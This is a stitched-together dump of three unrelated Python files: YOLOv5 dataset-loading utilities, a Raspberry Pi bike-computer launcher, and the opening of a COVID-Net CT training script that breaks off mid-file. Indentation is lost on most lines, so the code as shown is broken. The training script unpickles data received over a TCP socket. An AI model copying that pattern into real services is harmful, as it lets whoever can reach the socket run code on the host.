img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
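# Path mapping performed by img2label_paths(), shown on a hypothetical POSIX path; only the
# last '/images/' component is swapped for '/labels/' and the extension becomes .txt:
#   img2label_paths(['datasets/coco128/images/train2017/000000000009.jpg'])
#   # -> ['datasets/coco128/labels/train2017/000000000009.txt']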
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.im_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.im_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.im_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # same version
assert cache['hash'] == get_hash(self.label_files + self.im_files) # same hash
except Exception:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupt, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupt"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
LOGGER.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.im_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
        bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.im_files = [self.im_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache images into RAM/disk for faster training (WARNING: large datasets may exceed system resources)
self.ims = [None] * n
self.npy_files = [Path(f).with_suffix('.npy') for f in self.im_files]
if cache_images:
gb = 0 # Gigabytes of cached images
self.im_hw0, self.im_hw = [None] * n, [None] * n
fcn = self.cache_images_to_disk if cache_images == 'disk' else self.load_image
results = ThreadPool(NUM_THREADS).imap(fcn, range(n))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
gb += self.npy_files[i].stat().st_size
else: # 'ram'
self.ims[i], self.im_hw0[i], self.im_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.ims[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.im_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.im_files))
for im_file, lb, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [lb, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupt"
pbar.close()
if msgs:
LOGGER.info('\n'.join(msgs))
if nf == 0:
LOGGER.warning(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.im_files)
x['results'] = nf, nm, ne, nc, len(self.im_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
LOGGER.info(f'{prefix}New cache created: {path}')
except Exception as e:
LOGGER.warning(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # not writeable
return x
def __len__(self):
return len(self.im_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = self.load_mosaic(index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *self.load_mosaic(random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = self.load_image(index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
# nl = len(labels) # update after cutout
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.im_files[index], shapes
def load_image(self, i):
# Loads 1 image from dataset index 'i', returns (im, original hw, resized hw)
im, f, fn = self.ims[i], self.im_files[i], self.npy_files[i],
if im is None: # not cached in RAM
if fn.exists(): # load npy
im = np.load(fn)
else: # read image
im = cv2.imread(f) # BGR
assert im is not None, f'Image Not Found {f}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im,
(int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_LINEAR if (self.augment or r > 1) else cv2.INTER_AREA)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.ims[i], self.im_hw0[i], self.im_hw[i] # im, hw_original, hw_resized
def cache_images_to_disk(self, i):
# Saves an image as an *.npy file for faster loading
f = self.npy_files[i]
if not f.exists():
np.save(f.as_posix(), cv2.imread(self.im_files[i]))
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
hp, wp = -1, -1 # height, width previous
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
@staticmethod
def collate_fn(batch):
im, label, path, shapes = zip(*batch) # transposed
for i, lb in enumerate(label):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
im4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2.0, mode='bilinear', align_corners=False)[
0].type(img[i].type())
lb = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
lb = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
im4.append(im)
label4.append(lb)
for i, lb in enumerate(label4):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path=DATASETS_DIR / 'coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(str(path) + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path=DATASETS_DIR / 'coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path=DATASETS_DIR / 'coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING: {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
lb = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any([len(x) > 8 for x in lb]): # is segment
classes = np.array([x[0] for x in lb], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in lb] # (cls, xy1...)
lb = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
lb = np.array(lb, dtype=np.float32)
nl = len(lb)
if nl:
assert lb.shape[1] == 5, f'labels require 5 columns, {lb.shape[1]} columns detected'
assert (lb >= 0).all(), f'negative label values {lb[lb < 0]}'
assert (lb[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {lb[:, 1:][lb[:, 1:] > 1]}'
_, i = np.unique(lb, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
lb = lb[i] # remove duplicates
if segments:
segments = segments[i]
msg = f'{prefix}WARNING: {im_file}: {nl - len(i)} duplicate labels removed'
else:
ne = 1 # label empty
lb = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
lb = np.zeros((0, 5), dtype=np.float32)
return im_file, lb, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('path/to/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
        verbose: Print stats dictionary
        profile: Time saving/loading of the stats file in both *.npy and *.json formats
        hub: Also write stats.json and resized image copies for Ultralytics HUB
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix('') # dataset directory == zip name
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, 'JPEG', quality=75, optimize=True) # save
except Exception as e: # use OpenCV
print(f'WARNING: HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_AREA)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.im_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.im_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
main.py
|
#!/home/pi/bike-computer/.venv/bin/python
import os
import serial
import serial.tools.list_ports
from multiprocessing import Process
import subprocess
import tkinter as tk
import dashboard
import interpreter
def runScript(script_name):
    subprocess.run(["python", script_name])
if __name__ == '__main__':
p = Process(target=runScript, args=('/home/pi/bike-computer/firmware/camera.py',))
p.start()
    ports = serial.tools.list_ports.comports()
    arduino_port = None
    for port, desc, hwid in sorted(ports):
        if desc == "Arduino Micro":
            print("{}: {} [{}]".format(port, desc, hwid))
            arduino_port = port
            break
    if arduino_port is None:
        raise RuntimeError("Arduino Micro not found on any serial port")
    arduino = serial.Serial(arduino_port, 115200, timeout=0.1, write_timeout=0)
    path = os.path.expanduser('~/bike-computer/data/')
intrptr = interpreter.Interpreter(arduino,path)
root = tk.Tk()
dbg = dashboard.DashboardGUI(root, intrptr)
root.overrideredirect(True)
root.after(1, dbg.update_display)
root.mainloop()
|
run_covidnet_ct_2_lps.py
|
"""
Training/testing/inference script for COVID-Net CT models for COVID-19 detection in CT images.
"""
import os
import sys
import time
import cv2
import json
import shutil
import numpy as np
from math import ceil
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay
from dataset import COVIDxCTDataset
from data_utils import auto_body_crop
from utils import parse_args
import pickle
import socket
from multiprocessing import Process, Queue, Value, Manager
from ctypes import c_char_p
# Dict keys
TRAIN_OP_KEY = 'train_op'
TF_SUMMARY_KEY = 'tf_summaries'
LOSS_KEY = 'loss'
# Tensor names
IMAGE_INPUT_TENSOR = 'Placeholder:0'
LABEL_INPUT_TENSOR = 'Placeholder_1:0'
CLASS_PRED_TENSOR = 'ArgMax:0'
CLASS_PROB_TENSOR = 'softmax_tensor:0'
TRAINING_PH_TENSOR = 'is_training:0'
LOSS_TENSOR = 'add:0'
# Names for train checkpoints
CKPT_NAME = 'model.ckpt'
MODEL_NAME = 'COVID-Net_CT'
# Output directory for storing runs
OUTPUT_DIR = 'output'
# Class names ordered by class index
CLASS_NAMES = ('Normal', 'Pneumonia', 'COVID-19')
TCP_IP = '127.0.0.1'
port = 17000
num_iters = 260
s = 0
MAX_WORKERS = 1
global_var_vals = None
def safe_recv(size, server_socket):
    """Receive exactly `size` bytes from the socket (recv may return partial chunks)."""
    data = bytearray()
    while len(data) < size:
        try:
            temp = server_socket.recv(size - len(data))
            if not temp:
                # Peer closed the connection; stop instead of spinning forever
                break
            data.extend(temp)
        except socket.error as exc:
            print("Error receiving data: {}".format(exc))
            break
    return bytes(data)
def handleWorker(port, gradients_q, done_flag, global_var_vals, ack_q, n):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to port : ", port)
s.bind((TCP_IP, port))
s.listen(1)
conn, addr = s.accept()
print('Connection address:', addr)
k = 0
while 1:
size = safe_recv(17, conn)
size = pickle.loads(size)
data = safe_recv(size, conn)
# print("Received size: ", size)
local_worker_gradients = pickle.loads(data)
# print(local_worker_gradients)
gradients_q.put(local_worker_gradients)
while (done_flag.value == 0):
pass
size = len(global_var_vals.value)
size = pickle.dumps(size, pickle.HIGHEST_PROTOCOL)
conn.sendall(size)
print("Send size: "+str(len(size)))
conn.sendall(global_var_vals.value)
ack_q.put(1)
k = k + 1
# print("Worker: ", k)
if (k == (n + 1)):
print("Working: Breaking from loop")
break
conn.close()
s.close()
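# Wire format implied by handleWorker(): each worker sends a pickled payload length (read
# here as a fixed 17-byte header) followed by the pickled gradient list, then reads back the
# updated variable values the same way. A worker-side sketch (sock and grads are assumed to
# exist, and padding the header to exactly 17 bytes is an assumption not shown in this file):
#   payload = pickle.dumps(grads, pickle.HIGHEST_PROTOCOL)
#   sock.sendall(pickle.dumps(len(payload), pickle.HIGHEST_PROTOCOL))
#   sock.sendall(payload)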
def dense_grad_filter(gvs):
"""Filter to apply gradient updates to dense layers only"""
return [(g, v) for g, v in gvs if 'dense' in v.name]
def simple_summary(tag_to_value, tag_prefix=''):
"""Summary object for a dict of python scalars"""
return tf.Summary(value=[tf.Summary.Value(tag=tag_prefix + tag, simple_value=value)
for tag, value in tag_to_value.items() if isinstance(value, (int, float))])
def create_session():
"""Helper function for session creation"""
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
return sess
def load_graph(meta_file):
"""Creates new graph and session"""
graph = tf.Graph()
with graph.as_default():
# Create session and load model
sess = create_session()
# Load meta file
print('Loading meta graph from ' + meta_file)
saver = tf.train.import_meta_graph(meta_file, clear_devices=True)
return graph, sess, saver
def load_ckpt(ckpt, sess, saver):
"""Helper for loading weights"""
# Load weights
if ckpt is not None:
print('Loading weights from ' + ckpt)
saver.restore(sess, ckpt)
def get_lr_scheduler(init_lr, global_step=None, decay_steps=None, schedule_type='cosine'):
    """Return the learning rate (or LR tensor) for the requested schedule type"""
    if schedule_type == 'constant':
        return init_lr
    elif schedule_type in ('cosine', 'cosine_decay'):
        return tf.train.cosine_decay(init_lr, global_step, decay_steps)
    elif schedule_type == 'exp_decay':
        return tf.train.exponential_decay(init_lr, global_step, decay_steps)
